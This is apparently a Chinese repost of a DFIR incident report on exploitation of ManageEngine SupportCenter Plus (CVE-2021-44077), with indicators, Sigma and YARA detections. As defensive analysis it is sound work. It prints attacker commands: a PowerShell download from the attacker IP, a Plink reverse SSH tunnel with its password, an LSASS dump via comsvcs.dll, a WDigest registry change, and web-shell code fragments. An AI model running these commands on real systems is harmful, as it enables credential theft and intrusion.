文章前言
在这次持续多天的入侵攻击事件中,我们观察到一个威胁参与者通过利用ManageEngine SupportCenter Plus中的漏洞获得了对某个组织的初始访问权限,威胁参与者在服务器上发现文件并使用web shell转储凭据,使用Plink和RDP横向移动到关键服务器,并使用web shell和RDP渗透敏感信息
联邦调查局和CISA公布的一份报告中描述到APT攻击者正在使用CVE-2021-44077初步进入关键基础设施部门的组织网络,如医疗保健、金融、电子和IT咨询行业
https://www.cisa.gov/uscert/ncas/alerts/aa21-336a
简易概括
入侵始于通过利用面向互联网的ManageEngine SupportCenter Plus实例的CVE-2021-44077漏洞,威胁参与者成功利用了SupportCenter Plus中的RCE漏洞,该漏洞允许他们在互联网可访问的目录中丢弃web shell我们看到的漏洞看起来与上公开的POC漏洞开源代码库非常相似:
https://github.com/horizon3ai/CVE-2021-44077
之后威胁参与者对系统执行一些通用枚举,并使用web shell在服务器上启用WDigest身份验证,系统上的枚举包括查询网络配置、加入域的计算机列表、用户和操作系统信息以及滩头阵地上的当前用户会话
之后攻击者在几天内会检查哪些用户使用webshell登录到了beachhead服务器,最后在第七天威胁参与者在系统上执行LSASS转储,并捕获了最近登录系统的管理用户的凭证,在这种情况下由于之前启用了WDigest身份验证威胁参与者可以访问用户的明文凭据
之后攻击者下载了ekern.exe,这是一个重命名版本的Plink,并部署了一个脚本来建立到beachhead服务器的RDP端口的反向SSH连接,威胁参与者成功地建立了到beachhead服务器的交互式RDP会话,并开始列举网络上的其他计算机
从beachhead通过RDP横向移动到另外三台服务器,包括一台域控制器、一台文件服务器和另一台服务器,在整个入侵过程中机密文件通过RDP混合使用web shell访问和手动键盘访问从网络中泄露出去
这些文件对业务及其合作伙伴至关重要,而且所窃取的这些文件是有选择的,就好像攻击者在寻找特定的材料,当要渗透某些文件或文件夹时,一个最重要的文件夹被渗透,同时传递其他合作伙伴的文件夹和文件,除了提到的文件和文件夹之外,内部机器证书被审查并随后被泄露,迄今为止,尚未在任何公共转储或销售中发现泄露的信息,在窃取这些信息后威胁参与者很快被逐出网络
时间列表
初始访问
最初的访问始于通过开发ManageEngine SupportCenter Plus CVE-2021-44077,这是一个未经验证的远程代码执行漏洞,造成这种攻击的主要有两种HTTP请求
第一个请求发送了一个包含PE文件内容的POST,该文件被写入:
C:Program FilesManageEngineSupportCenterPlusbinmsiexec.exe
/RestAPI/ImportTechnicians?step=1第二个请求试图安装Zoho的Site24x7性能监控工具,但间接调用了上传的msiexec.exe文件,关于这一点的更多细节将在执行部分介绍
/RestAPI/s247action?execute=s247AgentInstallationProcess&apikey=asdasd针对面向互联网的服务器的攻击来自两个Tor出口节点,据观察攻击的每一步都来自不同的TOR出口节点
2.58.56.14185.220.101.76
命令执行
CVE-2021-44077漏洞利用的第二阶段涉及启动Zoho的Site24x7性能监控工具的安装,Support Center Plus将通过运行以下命令经由msiexec.exe调用安装来完成此操作
msiexec.exe/I site 24x7 windows agent . MSI edita 1 = as dasd/qn运行此命令时Support Center Plus的运行路径是:
C:Program FilesManageEngineSupportCenterPlusbin这意味着威胁入侵者上传的msiexec.exe将比合法的微软实用程序更受青睐
一旦恶意msiexec.exe被执行,嵌入的Java有效负载将被解码并写入:
C:Program FilesManageEngineSupportCenterPluscustomloginfm2.jsp传递给msiexec.exe的参数从未使用过,Site24x7性能监控工具也从未安装过
web shell被写入到一下路径:
C:Program filesManageEngineSupportCenterPlusCustomLoginfm2.jsp
该位置可通过web访问,这意味着威胁参与者可以通过互联网上的web浏览器与webshell进行交互,下面是一些通过web shell运行的命令
https://server.example/custom/login/fm2.jsp?cmd=arp -ahttps://server.example/custom/login/fm2.jsp?cmd=del c:windowstemplogctl.ziphttps://server.example/custom/login/fm2.jsp?cmd=systeminfohttps://server.example/custom/login/fm2.jsp?cmd=tasklisthttps://server.example/custom/login/fm2.jsp?cmd=wmic computersystem get domain
下面是一些与msiexec.exe相关的信息:
compiler timestamp of Thu Nov 14 12:00:07 2075debugger timestamp of Wed Oct 03 09:01:59 2068File version 1.0.0.0PDB of c:usersadministratormsiexecmsiexecmsiexecobjx86debugmsiexec.pdb.NET(v4.0.30319)
威胁参与者之前已经上传了一个不同的文件,在webshell创建的几分钟前命名为相同的东西,在该文件的执行似乎失败后威胁参与者从上面上传了msiexec.exe文件,该文件在几秒钟后创建了webshell
这两个msiexec文件包含相同的webshell,但有一些不同的特征,以下是第一次尝试失败的msiexec文件的一些信息
compiler timestamp of Mon Oct 17 01:32:17 2067debugger timestamp of Sat Apr 15 14:30:09 1995File version 1.0.0.0PDB of m:workshellllmsiexecmsiexecobjreleasemsiexec.pdb.NET(v2.0.50727)
可以看到主要区别是有趣的PDB路径m:workshellll和.NET版本的不同
应用日志
我们可以从Catalina.txt日志中看到当威胁参与者运行fxs.bat(RDP隧道)等特定命令时,应用程序认为进程被挂起(运行30秒以上)并创建一条警告消息
[REDACTED]|[REDACTED]|[org.apache.catalina.valves.StuckThreadDetectionValve]|[WARNING]|[57]: Thread [/login/fm2.jsp-1649702723966_###_] (id=[64]) has been active for [39,915] milliseconds (since REDACTED]) to serve the same request for [http://REDACTED:8080/custom/login/fm2.jsp?cmd=C%3A%5CWindows%5Ctemp%5Cfxs.bat] and may be stuck (configured threshold for this StuckThreadDetectionValve is [30] seconds). There is/are [1] thread(s) in total that are monitored by this Valve and may be stuck.|在Securitylog0.txt文件中,我们可以一遍又一遍地看到对web shell和时间戳的请求,但除此之外就没什么了
[REDACTED]|[REDACTED]|[com.manageengine.servicedesk.filter.SdpSecurityFilter]|[INFO]|[76]: RequestURI::::::: /login/fm2.jsp|这些是我们能找到的与这次入侵相关的所有支持中心和日志,还有很多需要改进的地方
权限维持
在入侵过程中观察到的唯一持久性形式是在利用过程中落入beachhead的webshell,Java WebShell中有多种远程交互功能,包括:
-
命令执行
-
查看和下载文件
-
创建新文件
权限提升
beachhead ManageEngine服务器上不需要权限提升,因为该漏洞通过web shell系统级权限执行命令,后来在入侵过程中他们转储了一个用户的凭据,该用户拥有允许在整个环境中横向移动的权限,在凭证访问一节中有更多关于转储方法的信息
防御绕过
在初始访问期间攻击者上传了一个名为msiexec.exe的二进制文件到系统上,这个二进制文件不是合法的微软msiexec.exe,而是一个包含嵌入式编码web shell的下载程序,该可执行文件的命名具有融入环境并看起来合法的好处,同时对利用CVE-2021-44077也很关键,在入侵的后期攻击者转储LSASS进程(参见凭证访问一节),在泄漏LSASS转储之后,攻击者删除了转储文件以隐藏他们的踪迹
从LSASS转储中获取凭证后威胁参与者返回到环境中并下载名为ekern.exe通过SSH建立RDP隧道连接,Ekern.exe是plink.exe重命名工具是为了不被发现,此外ekern.exe这个名字类似于ESET的已知成分名叫ekrn.exe
在beachhead系统上威胁参与者查询注册表检查是否启用了WDigest:
HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigestUseLogonCredentialWDigest允许LSASS中的凭据缓存,这将导致用户的明文密码存储在内存中,WDigest凭据缓存的预期目的是方便使用HTTP和SASL进行明文身份验证,但是这可能会被威胁参与者滥用来检索用户的明文凭据,下面是从web shell执行的命令:
powershell.exe reg query HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential
该注册表值在系统中不存在,这通知攻击者WDigest在beachhead上被禁用
22秒后威胁参与者通过webshell使用以下命令启用了WDigest:
powershell.exe Set-ItemProperty -Force -Path 'HKLM:SYSTEMCurrentControlSetControlSecurityProvidersWDigest' -Name 'UseLogonCredential' -Value '1'
凭证访问
启用WDigest后,攻击者在多天内进行了多次检查以查看谁登录了,在此期间一个特权用户登录到系统进行维护工作,之后威胁参与者使用comsvcs.dll转储LSASS,威胁参与者通过tasklist命令列出正在运行的进程,并使用输出中LSASS的PID传递给凭据转储命令
"C:windowsSystem32rundll32.exe" C:windowsSystem32comsvcs.dll MiniDump C:windowstemplogctl.zip full
然后LSASS转储被从环境中渗透出来以便进行离线分析,其余的操作由从LSASS转储中提取密码的帐户执行
服务发现
威胁参与者使用web shell fm2.jsp在主机上执行他们的初始发现,下面是发送到webshell的GET请求,发现命令传递给cmd参数,该参数作为PowerShell运行
powershell.exe reg query HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredentialpowershell.exe query sessionpowershell.exe systeminfopowershell.exe quserpowershell.exe arp -apowershell.exe wmic computersystem get domainpowershell.exe netstat -anpowershell.exe ipconfig /all
他们还使用webshell来查看目录,这里有几个例子
/custom/login/fm2.jsp?p=C:/Windows/Temp&action=get/custom/login/fm2.jsp?p=C:/Windows&action=get/custom/login/fm2.jsp?p=C:/&action=get/custom/login/fm2.jsp?p=C:/ALLibraries&action=get/custom/login/fm2.jsp?p=C:/Users&action=get
C:/Windows/TempC:/WindowsC:/C:/ALLibrariesC:/Users
后渗透类
威胁参与者使用webshell来下载file.exe拖到beachHead,并将其保存为ekern.exe并使用PowerShell下载
powershell.exe (New-Object System.Net.WebClient).DownloadFile('hXXp://23.81.246[.]84/file.exe', 'c:windowstempekern.exe')文件ekern.exe是的重命名副本Plink.exe命令行SSH客户端
Plink与名为批处理脚本的FXS.bat结合使用与威胁参与者的服务器建立SSH连接
让我们分析一下这个命令的含义:
威胁入侵参与者定义了一个自定义目标端口来Plink而不是默认的SSH端口22,参与者使用端口转发技术监听远程端口23.81.246.84:49800,并将请求转发到127.0.0.1:3389,这导致参与者能够通过SSH隧道RDP到beachhead服务器
脚本FXS.bat多次重复使用,以建立与各种主机的连接,然后参与者将环回地址替换为各种内部主机,ManageEngine服务器充当代理,在目标主机和威胁参与者的服务器之间转发RDP流量:
echo y|C:windowstempekern.exe -ssh -P 443 -l admin1 -pw Asde345@#$345sdfDFVCDF -R 23.81.246.84:49800:10.X.X.X:3389 23.81.246.84
命令控制
我们观察到的所有命令和控制流量都是通过SSH隧道到达23.81.246.84,该IP地址暴露了端口上的SSH服务器443这就是beachhead的联系,23.81.246.84:433的headers说明了威胁者正在使用Bitvise SSH服务器:
SSH-2.0-8.49 FlowSsh: Bitvise SSH Server (WinSSHD) 8.49: free only for personal non-commercial useKey type: ssh-rsaKey: AAAAB3NzaC1yc2EAAAADAQABAAABgQDiz99PA7RuWA1mO7OHiG83q0yqpMF2U/b2iDZNfrLSHnq0mb+H/RexV2sgYwWaKNDTKtm6+YMlAgwOpr8dW4+22pknXagsBs1ln/uza+a0QUZjhTi1/jGyaiLL0AV0WPr7u7mAeCx4U9s0n2WTyXmGZAgZHJBQl+wsRWJgbSxSKAr4cV6knFNuK0oXxp1NzJXzMQeDO2sUqQ8+uymA4TMNLGyX6T5EHQiP2vVhio7NlPsnqJb7ilYsrPWPWIV/rB5ALii+G598moQbJcLLBanDFjWDQ+7z3fNHN0YH7wIozkdgsQKqBVv37HQcCYfySc82HYq+vD7yA54nS/UChZBHTTPXDupfJJScG9vJKklKNb5a49uzDVhsB9yT/Ihrvlex52z1gXenrt97WnaGILsl0ljuVbtBQmELZK126hPJIysJ+YuBfqDYokvELi7aZKRR6wjYFeGpcB0FErekuUaalUSvuX14xHxtm2vuKVARwdogMBvKDLL7B5gxckIsNuk=Fingerprint: 68:22:ef:82:8b:57:e4:62:37:86:61:bc:98:fc:53:35
数据窃取
在beachhead机器上获得立足点后攻击者首先使用webshell下载ManageEngine SupportCenter Plus应用程序的postgres DB备份
初次访问七天后攻击者通过webshell从服务器中窃取了一个证书、一个Visio文件和一个帐户的excel表
通过webshell下载的服务器证书
通过webshell下载的Visio文件:
通过webshell下载的Excel文件:
有人还看到一名攻击者在RDP会议期间泄露机密文件,并在打开文件时触发来自192.221.154.141和8.0.26.137的令牌
影响说明
在窃取机密信息后威胁参与者很快被逐出网络
相关标志
Atomic
SSH Reverse Proxy23.81.246.84Webshell Query IP5.239.37.785.114.3.2005.113.111.435.196.132.85ManageEngine Exploit Origin2.58.56.14185.220.101.76Canary Document Alert IP8.0.26.137192.221.154.141 (updated 6/6 15:55 UTC, was missing the 41 at the end)
Computed
fm2.jsp05cee9b71bdd99c22dde19957a6169e7a188d7283c2b4744c4e91f18c59588c8471a2a868703f52c56b3164ae0becfc5a81bfda600db9aa6d0f048767a9684671ad5899bFXS.bat03cbb2227284c4842906d3576372e6048aeb24b51b339446cac2cb0a4c93ad98f709cf536e5289df8be0403eda9f63f14c3b3c753a11e924e00484958166d03fcf922510ekern.exe848f7edb825813aee4c09c7f2ec71d274709827c7a95012ab970bf651ed5183083366c79828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924dmsiexec.exe0be5d9235059cb4f8b16fe798e822444d18c88294c776815a5b1be0bd4508c9442b3877a4d8f797790019315b9fac5b72cbf693bceeeffc86dc6d97e9547c309d8cd9bafmsiexec.exe (failed)9872E0A47E2F44BF6E22E976F061DAC0916952C5407233EEC5C0176C0E04F88AF9E63978C7862701AD23B631EF854570C67FC33331F6853DCA65D4C3E825E2C3BB9B16EE
Behavioral
See custom Sigma rules below for additional behaviors turned into rules.The threat actor would exploit ManageEngine via CVE-2021-44077 from a Tor Exit Node (2.58.56.14 and 185.220.101.76) followed by the execution of a webshell extractor matching the name msiexec.exeA batch script is used to facilitate rdp tunneling including the use of Plink.Canary alerts for documents exfiltrated from the network were observed being opened from the IP addresess 8.0.26.137 and 192.221.154.141
检测方法
网络检测
ET TOR Known Tor Exit Node Traffic group 48ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 48ET EXPLOIT [CISA AA21-336A] Zoho ManageEngine ServiceDesk Possible Exploitation Activity (CVE-2021-44077)ET INFO Generic HTTP EXE Upload InboundET INFO Executable Download from dotted-quad Host
Sigma
Sigma rules
Webshell Usage with ManageEngine SupportCenter Plus
SSH over port 443 with known Server and Client Strings
Registry Query for WDigest
Enable WDigest using PowerShell
Enable WDigest using PowerShell (ps_module)
SigmaHQ rules
PowerShell Download from URL: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml
PowerShell DownloadFile: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml
Process Dump via Comsvcs DLL:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_comsvcs_procdump.yml
Process Dump via Rundll32 and Comsvcs.dll:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml
Suspicious MsiExec Directory:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml
Wdigest Enable UseLogonCredential:
https://github.com/SigmaHQ/sigma/blob/b4cb047ae720b37b11f8506de7965dc29d5920be/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml
Windows PowerShell Web Request:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_script/posh_ps_web_request.yml
Windows Webshell Creation:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_webshell_creation_detect.yml
Shells Spawned by Web Servers:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml
Suspicious Plink Remote Forwarding:
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_plink_remote_forward.yml
Webshell Detection With Command Line Keywords:
https://github.com/SigmaHQ/sigma/blob/329074d935ac81dd91cafdce5e5a43c95cca068d/rules/windows/process_creation/proc_creation_win_webshell_detection.yml
Yara
/*YARA Rule SetAuthor: The DFIR ReportDate: 2022-06-06Identifier: Case 12993Reference: https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/*//* Rule Set ----------------------------------------------------------------- */rule case_12993_cve_2021_44077_msiexec {meta:description = "Files - file msiexec.exe"author = "The DFIR Report"reference = "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/"date = "2022-06-06"hash1 = "4d8f797790019315b9fac5b72cbf693bceeeffc86dc6d97e9547c309d8cd9baf"strings:$x1 = "C:\Users\Administrator\msiexec\msiexec\msiexec\obj\x86\Debug\msiexec.pdb" fullword ascii$x2 = "M:\work\Shellll\msiexec\msiexec\obj\Release\msiexec.pdb" fullword ascii$s2 = "..\custom\login\fm2.jsp" fullword wide$s3 = "Qk1QDQo8JUBwYWdlIGltcG9ydD0iamF2YS51dGlsLnppcC5aaXBFbnRyeSIlPg0KPCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC56aXAuWmlwT3V0cHV0U3RyZWFtIiU+" wide$s4 = "Program" fullword ascii /* Goodware String - occured 194 times */$s5 = "Encoding" fullword ascii /* Goodware String - occured 809 times */$s6 = "base64EncodedData" fullword ascii /* Goodware String - occured 1 times */$s7 = "System.Runtime.CompilerServices" fullword ascii /* Goodware String - occured 1950 times */$s8 = "System.Reflection" fullword ascii /* Goodware String - occured 2186 times */$s9 = "System" fullword ascii /* Goodware String - occured 2567 times */$s10 = "Base64Decode" fullword ascii /* Goodware String - occured 3 times */$s11 = "$77b5d0d3-047f-4017-a788-503ab92444a7" fullword ascii$s12 = " 2021" fullword wide$s13 = "RSDSv_" fullword ascii$s14 = "503ab92444a7" ascii$s15 = "q.#z.+" fullword widecondition:uint16(0) == 0x5a4d and filesize < 90KB and1 of ($x*) and 4 of them}rule case_12993_cve_2021_44077_webshell {meta:description = "Files - file fm2.jsp"author = "The DFIR Report"reference = "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/"date = "2022-06-06"hash1 = "8703f52c56b3164ae0becfc5a81bfda600db9aa6d0f048767a9684671ad5899b"strings:$s1 = " Process powerShellProcess = Runtime.getRuntime().exec(command);" fullword ascii$s2 = "out.write(("User:\t"+exec("whoami")).getBytes());" fullword ascii$s3 = "return new String(inutStreamToOutputStream(Runtime.getRuntime().exec(cmd).getInputStream()).toByteArray(),encoding);" fullword ascii$s4 = "out.println("<pre>"+exec(request.getParameter("cmd"))+"</pre>");" fullword ascii$s5 = "out.println("<tr "+((i%2!=0)?"bgcolor=\"#eeeeee\"":"")+"><td align=\"left\"> <a href=\"javascript:ge" ascii$s6 = "out.println("<h1>Command execution:</h1>");" fullword ascii$s7 = " String command = "powershell.exe " + request.getParameter("cmd");" fullword ascii$s8 = "shell(request.getParameter("host"), Integer.parseInt(request.getParameter("port")));" fullword ascii$s9 = "out.write(exec(new String(b,0,a,"UTF-8").trim()).getBytes("UTF-8"));" fullword ascii$s10 = "static void shell(String host,int port) throws UnknownHostException, IOException{" fullword ascii$s11 = " powerShellProcess.getErrorStream()));" fullword ascii$s12 = "encoding = isNotEmpty(getSystemEncoding())?getSystemEncoding():encoding;" fullword ascii$s13 = " // Executing the command" fullword ascii$s14 = ".getName()+"\"><tt>download</tt></a></td><td align=\"right\"><tt>"+new SimpleDateFormat("yyyy-MM-dd hh:mm:ss").format(" ascii$s15 = "String out = exec(cmd);" fullword ascii$s16 = "static String exec(String cmd) {" fullword ascii$s17 = " powerShellProcess.getInputStream()));" fullword ascii$s18 = "response.setHeader("Content-Disposition", "attachment; filename="+fileName);" fullword ascii$s19 = "out.println("<pre>"+auto(request.getParameter("url"),request.getParameter("fileName"),request.getParameter("cmd"))+"</p" ascii$s20 = " powerShellProcess.getOutputStream().close();" fullword asciicondition:uint16(0) == 0x4d42 and filesize < 30KB and8 of them}
MITRE
T1190 – Exploit Public-Facing Application
T1572 – Protocol Tunneling
T1012 – Query Registry
T1003 – OS Credential Dumping
T1087 – Account Discovery
T1057 – Process Discovery
T1021.001 – Remote Services: Remote Desktop Protocol
T1059.001 – Command and Scripting Interpreter: PowerShell
T1047 – Windows Management Instrumentation
T1070.004: File Deletion
T1078.002 – Domain Account
T1112 – Modify Registry
T1036 – Masquerading
T1505.003 – Server Software Component: Web Shell
原文始发于微信公众号(七芒星实验室):Exploit Leads to Data Exfiltration
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论